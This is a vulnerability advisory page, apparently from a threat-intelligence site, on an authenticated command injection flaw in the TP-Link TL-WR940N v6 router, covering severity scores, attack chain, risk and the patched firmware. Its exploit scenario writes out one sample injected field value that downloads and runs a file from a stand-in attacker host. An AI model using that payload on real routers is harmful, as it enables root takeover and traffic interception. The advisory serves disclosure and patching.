Skip to main content

TL-WR940N CVE-2026-11410

| EUVDEUVD-2026-37498 HIGH
OS Command Injection (CWE-78)
2026-06-16 TPLink
8.5
CVSS 4.0 · Vendor: TPLink
Share

Severity by source

Vendor (TPLink) PRIMARY
8.5 HIGH
CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
6.8 MEDIUM

Adjacent web-UI access (AV:A), low complexity once authenticated (AC:L), requires admin credentials (PR:H), no user interaction, and injected commands fully compromise the router OS (C/I/A:H).

3.1 AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
4.0 AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (TPLink).

CVSS VectorVendor: TPLink

CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Adjacent
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
X

Lifecycle Timeline

1
Analysis Generated
Jun 16, 2026 - 23:46 vuln.today

DescriptionCVE.org

An authenticated OS command injection vulnerability exists in the BigPond Cable (BPA) WAN configuration module in TL-WR940N v6 due to improper sanitization of user input. An attacker with administrative access may exploit this issue to execute arbitrary system commands with elevated privileges.

AnalysisAI

Authenticated OS command injection in the TP-Link TL-WR940N v6 router's BigPond Cable (BPA) WAN configuration module allows administrators to execute arbitrary system commands with elevated privileges on the device. The flaw stems from improper sanitization of user-supplied input in the WAN setup path and affects firmware versions prior to V6_260528. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Gain LAN/Wi-Fi adjacency to router
Delivery
Authenticate to web UI as admin
Exploit
Open BPA WAN configuration page
Execution
Submit BPA field with shell metacharacters
Persist
httpd executes injected command as root
Impact
Install persistence or pivot into LAN

Vulnerability AssessmentAI

Exploitation Exploitation requires (1) network adjacency to the router - specifically reach to its HTTP/HTTPS administration interface, which by default is only exposed on LAN/Wi-Fi (AV:A in the CVSS 4.0 vector), (2) valid administrative credentials for the web UI (PR:H), and (3) the attacker must reach and submit the BigPond Cable (BPA) WAN connection-type configuration form, since the injection lives in that specific WAN module's input handling. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment This is a moderate-priority issue rather than an emergency: the CVSS 4.0 vector (AV:A/AC:L/AT:N/PR:H/UI:N) limits exploitation to an attacker already on the adjacent network with high-privilege administrative credentials, which substantially constrains the realistic attacker pool. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who has obtained the router's admin password (via phishing, default-credential reuse, a prior CSRF, or a compromised LAN host) reaches the web UI from the LAN or Wi-Fi, navigates to the WAN configuration page, selects BigPond Cable as the connection type, and submits a crafted BPA parameter containing shell metacharacters (for example, a server or username field with `; wget http://attacker/x -O /tmp/x; sh /tmp/x #`). The injected command runs with the httpd process's elevated privileges, giving the attacker a persistent root-equivalent foothold on the router that can be used for DNS hijacking, traffic interception, or pivoting into the internal network. …
Remediation Vendor-released patch: TL-WR940N v6 firmware build V6_260528 - apply this firmware (or any later release) from https://www.tp-link.com/en/support/download/tl-wr940n/v6/#Firmware or https://www.tp-link.com/us/support/download/tl-wr940n/v6/#Firmware, following the FAQ at https://www.tp-link.com/us/support/faq/5131/. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Query network inventory for TP-Link TL-WR940N v6 devices and document current firmware versions. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-11410 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy